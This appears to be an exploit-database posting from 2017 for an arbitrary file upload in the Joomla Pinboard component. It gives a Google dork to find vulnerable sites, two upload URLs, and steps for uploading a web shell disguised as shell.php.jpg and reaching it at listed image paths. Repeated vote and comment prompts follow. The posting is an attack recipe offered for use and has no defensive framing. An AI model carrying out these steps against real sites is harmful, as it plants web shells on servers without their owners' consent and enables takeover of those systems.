Joomla Pinboard Romet File Upload

2017.09.03

Dyar Sahdi (IQ)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:com_pinboard

========================
Exploit Title: Joomla Pinboard Romet File Upload

Exploit Author: Dyar Sahdi


Google Dork: inurl:com_pinboard  


=======================================================================
Exploit: target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload 

Or

target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
===========================================================================
 [#] click on the photo in Top Of Left  
|  
| [#] upload your shell shell.php.jpg & Confirmer SVP  
|  
| [#] Pwd Your Shell  
|   
# target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg  
# 
# Or  
+  
+ target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg

References:

We All Dyar Sahdi

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Joomla Pinboard Romet File Upload

Dork: inurl:com_pinboard

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Joomla Pinboard Romet File Upload

Dork: inurl:com_pinboard

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.